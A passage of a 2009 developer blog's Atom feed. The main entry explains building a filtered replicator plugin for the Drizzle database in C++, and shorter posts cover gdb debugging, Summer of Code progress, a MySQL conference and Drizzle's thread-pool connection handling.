   <content type="html">Recently, I started working on a plugin that performs direct to Memcached replication in Drizzle. While working on this, I found that I wanted to be able to filter replication events based on schema or table names. I went ahead and implemented this in my Memcached plugin but then realized that this functionality would be better off as its own plugin as I imagine filtering of replication events will be a pretty common task people will want to perform. This led me to start working on a filtered replicator plugin for Drizzle. Before diving in to the plugin implementation, I should mention that &lt;a href=&quot;http://www.jpipes.com/&quot;&gt;Jay Pipes&lt;/a&gt; has previously &lt;a href=&quot;http://www.jpipes.com/index.php?/archives/290-Towards-a-New-Modular-Replication-Architecture.html&quot;&gt;written in significant detail&lt;/a&gt; on the replication architecture in Drizzle. I recommend reading that post from Jay if you are not familiar with replication in Drizzle before proceeding with this post.&lt;br&gt;

Jay is currently working on providing documentation regarding replication in Drizzle and you can track that work on the &lt;a href=&quot;http://drizzle.org/wiki/Replication&quot;&gt;wiki page&lt;/a&gt; he created. Its still a work in progress so if you really want to discover how all this works in Drizzle, I recommend having a look at the source code. Jay's work contains a copious amount of comments and is not difficult to read or understand; I highly recommend it. If you are interested in getting involved with this replication development, I'm sure Jay would be more than happy to get some contributors involved. The best way to get started is to ping the mailing list or one of the developers on #drizzle on FreeNode to indicate your interest.&lt;br&gt;

&lt;strong&gt;Development of the Replicator Plugin&lt;/strong&gt;

As with any plugin in Drizzle, there are 3 files that are important for building the plugin:
&lt;ul&gt;
	&lt;li&gt;plugin.ini&lt;/li&gt;
	&lt;li&gt;plugin.ac&lt;/li&gt;
	&lt;li&gt;plugin.am&lt;/li&gt;
&lt;/ul&gt;
Only the plugin.ini file is mandatory. This file is a standard ini-file that currently contains only one section - [plugin]. For the filtered replicator plugin, the plugin.ini file looked like:&lt;br&gt;

&lt;pre&gt;
[plugin]
name=filtered_replicator
title=Filtered Replicator
description=A simple filtered replicator which allows a user to filter out
            events based on a schema or table name
load_by_default=yes
sources=filtered_replicator.cc
headers=filtered_replicator.h
&lt;/pre&gt;

More information on the 3 files related to plugins are available on the &lt;a href=&quot;http://drizzle.org/wiki/Plugin_Build_System&quot;&gt;plugin build system page&lt;/a&gt; on the &lt;a href=&quot;http://drizzle.org/wiki&quot;&gt;Drizzle wiki&lt;/a&gt;. Since the replicator plugin does not depend on any external library, we don't need to worry about the other 2 plugin build files here.&lt;br&gt;

Now, since we are developing a replicator, we need to be aware of the replicator API provided by Drizzle's core kernel. That API is defined in the drizzled/plugin/replicator.h include file. If we look in that file, we find the following class definition:

&lt;pre&gt;
/**
 * Class which replicates Command messages
 */
class Replicator
{
public:
  Replicator() {}
  virtual ~Replicator() {}
  /**
   * Replicate a Command message to an Applier.
   *
   * @note
   *
   * It is important to note that memory allocation for the
   * supplied pointer is not guaranteed after the completion
   * of this function -- meaning the caller can dispose of the
   * supplied message.  Therefore, replicators and appliers
   * implementing an asynchronous replication system must copy
   * the supplied message to their own controlled memory storage
   * area.
   *
   * @param Command message to be replicated
   */
  virtual void replicate(Applier *in_applier,
                         drizzled::message::Command *to_replicate)= 0;

  /**
   * A replicator plugin should override this with its
   * internal method for determining if it is active or not.
   */
  virtual bool isActive() {return false;}
};
&lt;/pre&gt;

The above was developed by Jay and thanks to his awesome work (with really helpful comments), its pretty easy for us to determine what our replicator plugin needs to do. Basically, all we need to do is inherit from the Replicator class and implement the replicate() and isActive() methods and we have a simple replicator! Thus, we will have the following class:

&lt;pre&gt;
class FilteredReplicator: public drizzled::plugin::Replicator
{
public:
  FilteredReplicator() {}

  /** Destructor */
  ~FilteredReplicator() {}

  void replicate(drizzled::plugin::Applier *in_applier,
                 drizzled::message::Command *to_replicate);

  /**
   * Returns whether the replicator is active.
   */
  bool isActive();
};
&lt;/pre&gt;

Now, for the moment we want to filter by schema name or table name. Thus, we need a place to store the list of schema and table names to filter. Since this is Drizzle and Drizzle is all about using the STL, we'll go with a std::vector for each of these lists. We are going to assume that the list of schemas and table names to filter by are specified as a comma-separated list so we will need a method to parse a comma-separated list and populate the appropriate vectors. Finally, we will also need methods for determining whether a table name or schema name should be filtered or not. Based on all this, our class definition will now look like:

&lt;pre&gt;
class FilteredReplicator: public drizzled::plugin::Replicator
{
public:
  FilteredReplicator() {}

  /** Destructor */
  ~FilteredReplicator() {}

  void replicate(drizzled::plugin::Applier *in_applier,
                 drizzled::message::Command *to_replicate);

  /**
   * Returns whether the replicator is active.
   */
  bool isActive();

  /**
   * Populate the vector of schemas to filter from the
   * comma-separated list of schemas given. This method
   * clears the vector first.
   *
   * @param[in] input comma-separated filter to use
   */
  void setSchemaFilter(const std::string &amp;input);

  /**
   * Populate the vector of tables to filter from the
   * comma-separated list of tables given. This method
   * clears the vector first.
   *
   * @param[in] input comma-separated filter to use
   */
  void setTableFilter(const std::string &amp;input);

private:

  /**
   * Given a comma-separated string, parse that string to obtain
   * each entry and add each entry to the supplied vector.
   *
   * @param[in] input a comma-separated string of entries
   * @param[out] filter a std::vector to be populated with the entries
   *                    from the input string
   */
  void populateFilter(const char *input,
                      std::vector &amp;filter);

  /**
   * Search the vector of schemas to filter to determine whether
   * the given schema should be filtered or not. The parameter
   * is obtained from the Command message passed to the replicator.
   *
   * @param[in] schema_name name of schema to search for
   * @return true if the given schema should be filtered; false otherwise
   */
  bool isSchemaFiltered(const std::string &amp;schema_name);

  /**
   * Search the vector of tables to filter to determine whether
   * the given table should be filtered or not. The parameter
   * is obtained from the Command message passed to the replicator.
   *
   * @param[in] table_name name of table to search for
   * @return true if the given table should be filtered; false otherwise
   */
  bool isTableFiltered(const std::string &amp;table_name);

  std::vector schemas_to_filter;
  std::vector tables_to_filter;
};
&lt;/pre&gt;

Now that we have the API for our replicator plugin decided on, lets implement the replicate() function. This will perform the filtering of events. For this plugin, it looks pretty simple (which is a good thing!):

&lt;pre&gt;
void FilteredReplicator::replicate(drizzled::plugin::Applier *in_applier,
                                   drizzled::message::Command *to_replicate)
{
  /*
   * We first check if this event should be filtered or not...
   */
  if (isSchemaFiltered(to_replicate-&gt;schema()) ||
      isTableFiltered(to_replicate-&gt;table()))
  {
    return;
  }

  /*
   * We can now simply call the applier's apply() method, passing
   * along the supplied command.
   */
  in_applier-&gt;apply(to_replicate);
}
&lt;/pre&gt;

Our method for checking whether a schema should be filtered or not simply uses the STL. For completeness, that method looks as follows:

&lt;pre&gt;
bool FilteredReplicator::isSchemaFiltered(const string &amp;schema_name)
{
  vector::iterator it= find(schemas_to_filter.begin(),
                            schemas_to_filter.end(),
                            schema_name);
  if (it != schemas_to_filter.end())
  {
    return true;
  }
  return false;
}
&lt;/pre&gt;

There is not much more to it than that! As you can see, developing a replicator plugin does not have to be very difficult. Thanks to Jay's awesome work, it is actually fun! I am really enjoying working on my memcached applier at the moment (so much so that I probably spend too much time thinking about it when I should be working on other things...)&lt;br&gt;

&lt;strong&gt;System Variables in a Plugin&lt;/strong&gt;

The handling of system variables in a Drizzle plugin is not very pretty at the moment. Thankfully, &lt;a href=&quot;http://mysql-ha.com/&quot;&gt;Monty&lt;/a&gt; is working on refactoring system variables in Drizzle. You can read more about that work on the &lt;a href=&quot;http://drizzle.org/wiki/Refactor_system_variables&quot;&gt;wiki page&lt;/a&gt; Monty created. However, for now, we are stuck with the old system. I'm going to describe what I needed to do for one system variable that specifies which schemas we should filter when filtering replication events. The system variable declaration looks as follows:

&lt;pre&gt;
static DRIZZLE_SYSVAR_STR(filteredschemas,
                          sysvar_filtered_replicator_sch_filters,
                          PLUGIN_VAR_OPCMDARG,
                          N_(&quot;List of schemas to filter&quot;),
                          check_filtered_schemas, /* check func */
                          set_filtered_schemas, /* update func */
                          NULL /* default */);
&lt;/pre&gt;

You can see that we specified 2 callback functions: check_filtered_schemas() and set_filtered_schemas(). These are both called when a SET command is executed on this system variable. The check_filtered_schemas() function can be used to make sure that the input is well-formed (I don't really check for that at the moment). For the moment, the check_filtered_schemas() function just copies the input string to a temporary string. Here is the code for that function (the temporary string and mutex are declared as global variables):

&lt;pre&gt;
static int check_filtered_schemas(Session *,
                                  struct st_mysql_sys_var *,
                                  void *,
                                  struct st_mysql_value *value)
{
  char buff[STRING_BUFFER_USUAL_SIZE];
  int len= sizeof(buff);
  const char *input= value-&gt;val_str(value, buff, &amp;len);

  if (input &amp;&amp; filtered_replicator)
  {
    pthread_mutex_init(&amp;sysvar_sch_lock, NULL);
    pthread_mutex_lock(&amp;sysvar_sch_lock);
    tmp_sch_filter_string= new(std::nothrow) string(input);
    if (tmp_sch_filter_string == NULL)
    {
      pthread_mutex_unlock(&amp;sysvar_sch_lock);
      pthread_mutex_destroy(&amp;sysvar_sch_lock);
      return 1;
    }
    return 0;
  }
  return 1;
}
&lt;/pre&gt;

Next, we need a function to actually update the system variable. This function looks like so:

&lt;pre&gt;
static void set_filtered_schemas(Session *,
                                 struct st_mysql_sys_var *,
                                 void *var_ptr,
                                 const void *save)
{
  if (filtered_replicator)
  {
    if (*(bool *)save != true)
    {
      filtered_replicator-&gt;setSchemaFilter(*tmp_sch_filter_string);
      /* update the value of the system variable */
      *(const char **) var_ptr= tmp_sch_filter_string-&gt;c_str();
      /* we don't need this temporary string anymore */
      delete tmp_sch_filter_string;
      pthread_mutex_unlock(&amp;sysvar_sch_lock);
      pthread_mutex_destroy(&amp;sysvar_sch_lock);
    }
  }
}
&lt;/pre&gt;

You can see that having system variables in a plugin that can be updated is a little bit tricky right now in Drizzle. I wouldn't spend too much time worrying about this at the moment though. Like I said, once Monty finishes his system variable refactoring, we won't have to write such ugly and hard to understand code again. I am definitely looking forward to using the refactored system variables in Drizzle!&lt;br&gt;

&lt;strong&gt;Using the Plugin&lt;/strong&gt;

My branch with the filtered replicator plugin I developed is available on Launchpad. You can build it by pulling the branch from Launchpad:

&lt;pre&gt;
$ cd dir/to/place/branch
$ bzr branch lp:~posulliv/drizzle/filtered-replicator
$ cd filtered-replicator
$ ./config/autorun.sh &amp;&amp; ./configure &amp;&amp; make
&lt;/pre&gt;

After compiling the branch, we can start playing with it. First thing we need to do is to start Drizzle. That can be accomplished easily:

&lt;pre&gt;
$ cd /dir/with/replicator/branch
$ mkdir run
$ cd run
$ ../drizzled/drizzled --no-defaults --port=9306 \
--basedir=$PWD --datadir=$PWD \
--filtered-replicator-enable --filtered-replicator-filteredschemas='one,two' \
&gt;&gt; $PWD/drizzle.err 2&gt;&amp;1 &amp;
&lt;/pre&gt;

The above command will start drizzled along with the filtered replicator. One of the system variables associated with this replicator is which schemas to filter replication events by. It is possible to specify these when starting the server (as well as tables to filter replication events by). You will notice that we have not enabled any applier of replication events. What does this mean? Well, it means that nothing is being done with the events that are happening! Sure, I have a replicator running that filters events based on what I specify but nothing is done with these events! I'm currently working on a Memcached applier that takes events and pushes them to a Memcached server to maintain a proactive cache but that is the topic of another blog post.&lt;br&gt;

Now that we have the server up and running, lets see what system variables there are related to our replicator plugin (below, we are assuming the server is still running):

&lt;pre&gt;
$ cd /dir/with/replicator/branch
$ cd run
$ ../client/drizzle --port=9306
Welcome to the Drizzle client..  Commands end with ; or \g.
Your Drizzle connection id is 2
Server version: 2009.07.1067 Source distribution (filtered-replicator)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

drizzle&gt; show variables like '%replicat%';
+-------------------------------------+--------------+
| Variable_name                       | Value        |
+-------------------------------------+--------------+
| default_replicator_enable           | OFF          |
| filtered_replicator_enable          | ON           |
| filtered_replicator_filteredschemas | first,second |
| filtered_replicator_filteredtables  |              |
| innodb_replication_delay            | 0            |
+-------------------------------------+--------------+
5 rows in set (0 sec)

drizzle&gt;
&lt;/pre&gt;

Lets modify the schemas we are filtering replication by (after showing the actual code that performs this, we might as well do it!):

&lt;pre&gt;
drizzle&gt; set global filtered_replicator_filteredschemas = 'third,fourth';
Query OK, 0 rows affected (0 sec)

drizzle&amp;gt; show variables like '%replicat%';
+-------------------------------------+--------------+
| Variable_name                       | Value        |
+-------------------------------------+--------------+
| default_replicator_enable           | OFF          |
| filtered_replicator_enable          | ON           |
| filtered_replicator_filteredschemas | third,fourth |
| filtered_replicator_filteredtables  |              |
| innodb_replication_delay            | 0            |
+-------------------------------------+--------------+
5 rows in set (0 sec)

drizzle&gt;
&lt;/pre&gt;

&lt;strong&gt;Conclusion&lt;/strong&gt;

This plugin is still under development and I'd love any input from people. What I'd really like to know is what kind of filters would people like to be able to specify? How flexible would people want a filtered replicator to be? Right now, its only possible to filter by schema or table name but I could easily add more options if I thought they would be useful to people.
</content>
 </entry>
 
 <entry>
   <title>Summer of Code Progress</title>
   <link href="http://posulliv.github.com/2009/07/14/summer-of-code-progress"/>
   <updated>2009-07-14T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/07/14/summer-of-code-progress</id>
   <content type="html">Since we are around the half-way point in Google's Summer of Code, I thought I'd post a quick update on how things are going so far.&lt;br&gt;

Right now, INFORMATION_SCHEMA is nearly a full plugin in Drizzle. The final patch which finishes the extraction of I_S into a plugin has been proposed for merging and I'm still waiting for that to get pushed to trunk. Once that happens, I will be able to get started on modifying the implementation of the various I_S tables. All in all, its going pretty well. Its extremely satisfying to have patches accepted and placed straight into the codebase of the project that you are working on. I believe this is due to the fact that I am extremely lucky to be working on a project such as Drizzle with an awesome community. Unfortunately, I know that some SoC projects never get utilized which seems to me like a bit of a waste to me.&lt;br&gt;

To keep myself busy while waiting for patches to get merged, I decided to port the memcached UDF's to Drizzle. This has pretty much been completed save for a few UDF's that still need to be ported over. I added a test suite for the plugin tonight and am hoping to get it merged in the next week or two. A project that I'm just getting started with is creating a replication plugin for Drizzle that would send events to a memcached server. I'm hoping to get a simple prototype working in the next week or so and will then look for feedback from the community on it.&lt;br&gt;

I've been pretty busy this summer and so have not had much time for posting. I would like to say that will improve in the future but its unlikely!
</content>
 </entry>
 
 <entry>
   <title>Debugging Drizzle with GDB</title>
   <link href="http://posulliv.github.com/2009/05/21/debugging-drizzle-with-gdb"/>
   <updated>2009-05-21T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/05/21/debugging-drizzle-with-gdb</id>
   <content type="html">While working with Drizzle this week for my &lt;a href=&quot;http://drizzle.org/wiki/GSOC_Information_Schema&quot;&gt;GSoC project,&lt;/a&gt; I've been going through the source code to understand how INFORMATION_SCHEMA is currently implemented. Reading through the source code is obviously the best way to understand the logic behind the current I_S implementation but using a debugger to step through the execution of this code can be extremely helpful in speeding up this process. &lt;a href=&quot;http://torum.net/&quot;&gt;Toru&lt;/a&gt; previously published a &lt;a href=&quot;http://torum.net/2009/03/drizzle-gdb-osx/&quot;&gt;related post&lt;/a&gt; on debugging Drizzle with gdb which may also be useful.&lt;br&gt;

As Toru mentioned in his post, attaching gdb to Drizzle can be quite simple:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/115664.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

The above commands will open a xterm window with a gdb session started that is attached to the Drizzle server process. While this works fine, sometimes I am working on a remote machine and don't want to go to the hassle of setting up something like X11 forwarding or VNC to attach gdb to the server process. Also, while going through the I_S related code, I wanted to step through the code which occurs on server startup i.e. the things which happen before the xterm window with gdb opens as outlined above.&lt;br&gt;

Thus, I wrote the following simple script that I use to debug Drizzle with gdb.&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/115654.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

This script takes as an argument the path to the root of a Drizzle build directory. It then simply checks to see if Drizzle is running already or not. If it is already running, it will attach gdb to the Drizzle process in the current terminal window, for example:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/115668.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

If Drizzle is not already running, the script starts gdb so we can then kick Drizzle off ourselves within gdb and debug the server startup, for example:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/115671.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

That's about all I have for this post. As you can see, attaching gdb to Drizzle is a pretty straightforward process. I like to use my script mainly on remote servers but I also find it useful when I want to debug server startup on my local box too.
</content>
 </entry>
 
 <entry>
   <title>Attaching gdb To PostgreSQL</title>
   <link href="http://posulliv.github.com/2009/05/03/attaching-gdb-to-postgresql"/>
   <updated>2009-05-03T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/05/03/attaching-gdb-to-postgresql</id>
   <content type="html">This semester I've been doing a project with PostgreSQL and I needed to attach a debugger to PostgreSQL on numerous occasions to see what was going on. Since I didn't find much documentation on how to accomplish this, I thought I'd document it here for myself so I can refer to it in the future.&lt;br&gt;

First off, since we want to attach a debugger to a program, we should make sure that program is compiled with debugging information. WIth Postgres, we can easily do that by passing it as an option to the configure script in the top level of the Postgres source code. Thus, I run configure as follows:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/105847.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

Now we can just build the source and install as per usual. Enabling asserts was a good idea for me in my situation as it turns on many sanity checks which were useful for my purposes. Next, we start up the Postgres server and create a database if necessary. Once that is done, clients can connect to the database. So I go ahead and start a session using the psql command line utility and connect to my newly created database.&lt;br&gt;

Once a client was connected, I was able to run the following script in another terminal to find and attach to the Postgres process that was serving my session (this script is very much based on something that Tom Lane &lt;a href=&quot;http://archives.postgresql.org/pgsql-general/2007-07/msg00908.php&quot;&gt;posted&lt;/a&gt; to the pg-hackers mailing list some time ago):&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/105856.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

If no session is currently connected to Postgres, this script does nothing and silently exits. However, if a session is open, then gdb will attach to the Postgres server process serving that session. Here is an example output from when I ran it:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/105858.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

I ran a query in another terminal which triggered the breakpoint that I set in my debugger. The script I have provided does not work very elegantly if there are multiple clients connected to Postgres. It just lists out the process ID's of the various clients. For example, if 2 clients are connected to Postgres, we would get:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/105859.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

We could then manually use gdb to attach to the process that we are interested in. We can find out which process it is that we want to connect to from within our client's session as so:&lt;br&gt;

&lt;script src=&quot;http://gist.github.com/105863.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

Now we see that this session corresponds to process 16588. We can simply attach gdb to this process as is done in the above shell script.&lt;br&gt;

During the semester, this script worked fine for me as I never had to worry about multiple clients being connected at the same time. I was only ever dealing with 1 client connected to the server at a time so the above script served my purposes perfectly.&lt;br&gt;

Note that the above process won't work if you want to debug part of the backend startup sequence. If you are interested in doing this, a very brief explanation is given on the PostgreSQL developers &lt;a href=&quot;http://wiki.postgresql.org/wiki/Developer_FAQ#What_debugging_features_are_available.3F&quot;&gt;FAQ&lt;/a&gt;. I have not tried this and don't know how realiable or easy this is to do.
</content>
 </entry>
 
 <entry>
   <title>Google Summer of Code</title>
   <link href="http://posulliv.github.com/2009/04/21/google-summer-of-code"/>
   <updated>2009-04-21T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/04/21/google-summer-of-code</id>
   <content type="html">Yesterday, I found out that my proposal for Google's Summer of Code was &lt;a href=&quot;http://socghop.appspot.com/org/home/google/gsoc2009/ccharles&quot;&gt;accepted&lt;/a&gt;. This means I'll be getting paid to work full-time on Drizzle during the summer! I'll write a longer post on my actual project soon and I'll be updating this blog much more regularly during the summer with updates on my project.&lt;br&gt;

This week I'm at the &lt;a href=&quot;http://www.mysqlconf.com/mysql2009&quot;&gt;MySQL user's conference&lt;/a&gt; in Santa Clara where there are lots of interesting talks.

</content>
 </entry>
 
 <entry>
   <title>MySQL User Conference</title>
   <link href="http://posulliv.github.com/2009/04/14/mysql-user-conference"/>
   <updated>2009-04-14T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2009/04/14/mysql-user-conference</id>
   <content type="html">This year, I'm lucky enough to be going to the &lt;a href=&quot;http://www.mysqlconf.com/mysql2009&quot;&gt;MySQL User Conference&lt;/a&gt; in Santa Clara. I've decided on the tutorials I'll be attending:

&lt;ul&gt;
	&lt;li&gt;&lt;a href=&quot;http://www.mysqlconf.com/mysql2009/public/schedule/detail/7066&quot;&gt;The Revised Memcached Tutorial&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://www.mysqlconf.com/mysql2009/public/schedule/detail/6805&quot;&gt;Scale Up, Scale Out, and High Availability&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

I know a bit about Memcached (such as when it might be useful) but have never used it in practice as I've never had the opportunity so I'm looking forward to learning a bit more about Memcached. The second tutorial should also be pretty interesting and I'm looking forward to hearing some interesting scaling techniques which I might not have known about before. &lt;br&gt;

As for the sessions during the remainder of the week, I know I'll be attending all the ones being put on by various Drizzle developers, such as Brian's session on &lt;a href=&quot;http://www.mysqlconf.com/mysql2009/public/schedule/detail/5781&quot;&gt;Drizzle&lt;/a&gt;, Stewart's session on &lt;a href=&quot;http://www.mysqlconf.com/mysql2009/public/schedule/detail/6940&quot;&gt;memory management&lt;/a&gt; in MySQL/Drizzle, Eric's session on &lt;a href=&quot;http://www.mysqlconf.com/mysql2009/public/schedule/detail/6658&quot;&gt;libdrizzle&lt;/a&gt;, and Monty's session on &lt;a href=&quot;http://www.mysqlconf.com/mysql2009/public/schedule/detail/6830&quot;&gt;SQL&lt;/a&gt; called 'SQL is dead' (I'm pretty interested to hear what Monty has to say for that session!). I'm also planning on attending a few Ruby/Rails related sessions; I'm very interested in a session on ActiveRecord. There are a few sessions going on at the same time that I'm in two minds about at the moment. I'm thinking that I'll just make my mind up on the day about which one I will attend.&lt;br&gt;

Of all the keynote speakers, the one I most looking forward to hearing is&lt;a href=&quot;http://en.wikipedia.org/wiki/Andy_Bechtolsheim&quot;&gt; Andy Bechtolsheim&lt;/a&gt;'s. Also, I'll be at the &lt;a href=&quot;http://drizzle.org/wiki/Drizzle_Developer_Day_2009&quot;&gt;Drizzle developer day&lt;/a&gt; on the Friday at Sun and am looking forward to meeting all of the Drizzle team.
</content>
 </entry>
 
 <entry>
   <title>Connection Handling in Drizzle</title>
   <link href="http://posulliv.github.com/2009/03/07/connection-handling-in-drizzle"/>
   <updated>2009-03-07T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2009/03/07/connection-handling-in-drizzle</id>
   <content type="html">A few weeks ago I was reading the paper &lt;a href=&quot;http://db.cs.berkeley.edu/papers/fntdb07-architecture.pdf&quot; target=&quot;_blank&quot;&gt;Anatomy of a Database System&lt;/a&gt; by Hellerstein and Stonebraker. Chapter 2 of that paper discusses process models in database systems. After reading that paper, I was interested in seeing what Drizzle does in this regard so I began looking at the source code to see. Essentially, Drizzle uses the thread per DBMS worker model that is outlined in the paper where a single multi-threaded process hosts all the DBMS worker activity. Drizzle also has the concept of a pool of threads where workers are miltiplexed over a thread pool. The really nice thing about Drizzle in this regard is that the code for implementing the pool of threads is a plugin so if anyone is interested in writing their own thread scheduler, they can simply write a plugin for it. While developing an efficient scheduler might be a challenge, the mechanism for writing a plugin is pretty easy. I think that's pretty cool.&lt;br&gt;

Let's discuss how a client connectection is made to Drizzle and a query is executed. I'll provide a general overview first and then delve into more details. When the Drizzle server is started, a pool of threads is created. The intial MySQL worklog for the implementation of the thread pool mechanism can be found &lt;a href=&quot;http://forge.mysql.com/worklog/task.php?id=441&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt;. The number of threads in this pool can be specified by an administrator. The pthreads API is used for the creation of threads in Drizzle. The thread pool code also utilizes the &lt;a href=&quot;http://www.monkey.org/~provos/libevent/&quot; target=&quot;_blank&quot;&gt;libevent&lt;/a&gt; API which provides a mechanism to execute a callback function when a specific event occurs on a file descriptor. During the initialization of the thread pool, 2 callback functions are registered with libevent. These callback functions are to be executed whenever a session is added or killed. Each thread created during the thread pool initialization process has a thread body which waits for a session to process using libevent. When a new connection comes in, the thread pool code adds it to a queue for libevent processing. When a libevent callback function is invoked (more information about how and when this happens below), a session is removed from the queue and placed in one of two lists depending on the current state of the session - if the session is waiting for I/O it will be added a list indicating that; otherwise, if it is ready for processing, it will be added to a list indicating this. The body of each thread creating during the thread pool initialization is continuously running a loop which looks at the list of sessions that need processing. Whenever a session is added to that list, a thread will pop it from the list and process it. This thread will then go ahead and actually execute the command which the session wants to execute.&lt;br&gt;

Now, lets delve just a little bit further into how client connections are made based on the short summary given in the previous paragraph. I'll reference relevant files and methods in the &lt;a href=&quot;http://drizzle.org/doxygen/&quot; target=&quot;_blank&quot;&gt;Drizzle Doxygen docs &lt;/a&gt;as I go along when possible. The first thing we'll look at is the main() method of the server which is executed when the server starts. This method is contained in &lt;a href=&quot;http://drizzle.org/doxygen/d2/d35/drizzled_8cc-source.html&quot; target=&quot;_blank&quot;&gt;drizzled.cc&lt;/a&gt;. After initializing various things, the handle_connections_sockets() method is called. This method is also in the drizzled.cc file and its purpose is to handle new connections and spawn new threads to handle them. This method contains a while loop which continuously executes during the lifetime of the server waiting for new connections to come in to the server. Within this loop, a poll() system call is performed. The &lt;a href=&quot;http://linux.die.net/man/2/poll&quot; target=&quot;_blank&quot;&gt;poll() system call&lt;/a&gt; waits for an event on a file descriptor to occur. In this case, the event will be a new connection. When a new connection comes in, accept() is called to accept a connection on a socket and create a new connected socket. In the drizzled.cc file, this new socket is called new_sock (funnily enough!). Once error checking on the new socket is complete, a new &lt;a href=&quot;http://drizzle.org/doxygen/de/d41/classSession.html&quot; target=&quot;_blank&quot;&gt;Session&lt;/a&gt; object is allocated. If this allocation fails, then the server has reached a limit on the number of sessions that can occur. If no error occurs then the new Session object is passed as a parameter to the create_new_thread() method (also in the drizzled.cc file).&lt;br&gt;

The create_new_thread() method creates a new thread to handle the incoming connection. It is in this method that control actually enters the thread pool code. This occurs when the thread_scheduler.add_connection() method is called. thread_scheduler is a struct of type &lt;a href=&quot;http://drizzle.org/doxygen/de/d03/plugin__scheduling_8h-source.html&quot; target=&quot;_blank&quot;&gt;scheduling_st&lt;/a&gt; that defines the interface the scheduler plugin. When add_connection() is called on the thread_scheduler struct it calls the add_connection() function in whichever scheduler plugin is currently loaded. Since we are talking about the thread pool plugin, it will call the add_connection() function in the &lt;a href=&quot;http://drizzle.org/doxygen/d9/d0a/pool__of__threads_8cc-source.html&quot; target=&quot;_blank&quot;&gt;pool_of_threads.cc&lt;/a&gt; file. The add_connection() method notifies the thread pool about a new connection. A new session_scheduler object is created for that new connection. The session_scheduler class is defined in the &lt;a href=&quot;http://drizzle.org/doxygen/d8/d9a/session__scheduler_8h-source.html&quot; target=&quot;_blank&quot;&gt;session_scheduler.h&lt;/a&gt; file. This scheduler is set as the scheduler for the Session object that was passed as a parameter to the create_new_thread() method. Next, the libevent_session_add() method is called with the Session object passed as a parameter.&lt;br&gt;

The libevent_session_add() method adds the Session object to a queue for libevent processing. It signals libevent by writing a byte into the session_add pipe which will trigger the callback function libevent_add_session_callback(). This callback function pops the first Session object off the queue of objects waiting for libevent processing and adds the Session object to one of two lists: 1) sessions_need_processing or 2) sessions_waiting_for_io. Which list the Session object is added to depends on the current state of the session. Once the libevent_add_session_callback() function completes, the adding of a new connection to the pool of threads is essentially complete. A session is chosen to be executed within the body of a thread runnning in the pool of threads. Each thread in the pool of threads is running with an outer loop that is defined in the libevent_thread_proc() method. Essentially, each thread in the pool of threads is running an infinite loop that examines the session_need_processing list. When the sessions_need_processing list becomes non-empty, a thread will pop the first Session object from that list and actually go ahead and process a query in that session.&lt;br&gt;

The above description is not meant to be exhaustive. Actually reading through the pool of threads code is not that difficult and a grasp of what the code is doing can be easily obtained in a short period of time. I mostly wrote this for my own purposes so I had a better understanding of how it works.&lt;br&gt;

While the thread pool code works well, it is not without issues. Mark Callaghan &lt;a href=&quot;http://mysqlha.blogspot.com/2009/01/no-new-global-mutexes-and-how-to-make.html&quot; target=&quot;_blank&quot;&gt;points out&lt;/a&gt; that when using the thread pool model in MySQL, every command sent to the server requires a pthread mutex lock/unlock pair on LOCK_event_loop. He has also logged a &lt;a href=&quot;http://bugs.mysql.com/bug.php?id=42288&quot; target=&quot;_blank&quot;&gt;bug&lt;/a&gt; for this. Brian Aker &lt;a href=&quot;http://krow.livejournal.com/631051.html&quot; target=&quot;_blank&quot;&gt;responded to Mark's comments&lt;/a&gt; by saying that to get rid of this lock, you essentially need to write your own solution. This is much easier to attempt with Drizzle due to its plugin architecture that I mentioned at the beginning of this post. As he says &quot;We have abstracted out this problem now so you can focus on solving this problem if you want&quot;. I believe that the idea is that people can write/tune thread schedulers for their own workload since a generic scheduler will not work well for every workload. With this approach, people can easily write a scheduler which is uniquely suited to their workload.&lt;br&gt;

When it comes to the thread pool code, Brian also points out that the current design does not use libevent in the most optimal manner. He says &quot;When it comes to pool of threads I think the current design misses the point of using libevent. Currently it does not yield on IO block, so in essence all it is doing it keeping you from overwhelming the operating system's scheduler and providing a completion for a given action. For small queries this is fine, but for longer running queries this is not very good (though... most queries we see are pretty short so this part is not a huge concern). It needs to be redesigned to make better use of IO, and this is something we will work on soon&quot;. Its interesting to see how &lt;a href=&quot;http://www.danga.com/memcached/&quot; target=&quot;_blank&quot;&gt;memcached&lt;/a&gt; uses libevent as an example of seeing how another multi-threaded application uses libevent. Steven Grimm gives a brief outline in this &lt;a href=&quot;http://monkeymail.org/archives/libevent-users/2007-January/000450.html&quot; target=&quot;_blank&quot;&gt;thread&lt;/a&gt; of how he implemented thread support in memcached. I know Brian is currently working on a multi-threaded scheduler for Drizzle which is almost complete. He has mentioned in the past that there is a need to design a scheduler which really understands the difference between high/low and time constrained queries. I believe this is an interesting issue to think about.&lt;br&gt;

In future posts, I hope to investigate the thread pool code more. In particular, I'd like to see how libevent could be used in a more optimal way and talk about some of the design considerations for a cost-based scheduler. Also, if I have time, I hope to write about how a query is processed in Drizzle i.e. what happens after connection handling.&lt;br&gt;
</content>
 </entry>
 
 <entry>
   <title>Semester Project</title>
